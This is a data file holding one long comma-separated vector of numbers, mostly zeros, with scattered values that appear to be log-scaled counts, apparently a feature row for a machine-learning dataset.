4.8991863767100545, 3.0841946160253872, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 4.77912349311153, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.828641396489095, 0, 0.0, 0, 0.0, 0.0, 5.43372200355424, 0.0, 0, 0, 0, 5.390770307485499, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4965075614664802, 0.0, 2.1972245773362196, 0.0, 0.0, 4.06534854782536, 0.0, 0, 0, 2.1972245773362196, 0.0, 2.5649493574615367, 0, 4.969640753475787, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 7.177178314942233, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0, 0.0, 3.258096538021482, 0, 0, 0.0, 0.0, 0.0, 0, 2.5649493574615367, 3.4011973816621555, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.0841946160253877, 2.70805020110221, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.123963979403259, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.292158018817389, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.5263605246161616, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 2.833213344056216, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.581130849408909, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.784189633918261, 0.0, 0.0, 0.0, 0, 0.0, 4.1588830833596715, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 3.649511027115099, 4.762173934797756, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.649511027115099, 0.0, 9.620060922111964, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.248495242049359, 0, 0, 0, 2.1972245773362196, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6109179126442243, 7.69484807238461, 0.0, 3.2188758248682006, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 3.0841946160253872, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 4.825453896395788, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 2.5649493574615367, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 3.4825185607408002, 5.0301047650807, 0.0, 5.346437018291705, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 4.343805421853684, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 4.248495242049359, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 2.1972245773362196, 0.0, 4.143134726391533, 0, 0, 0.0, 5.679743138077019, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.4849066497880004, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.03709614637473, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 3.258096538021482, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.23410650459726, 0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 3.8066624897703196, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.418840607796598, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0, 0.0, 0.0, 0, 0.0, 0, 4.343805421853684, 4.605170185988092, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.9459101490553132, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.220355825078324, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.970291913552122, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0, 0.0, 0.0, 0.0, 4.110873864173311, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.518263445217987, 4.941642422609304, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 3.931825632724326, 8.921925063191328, 12.820490352323048, 0, 0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.5553480614894135, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 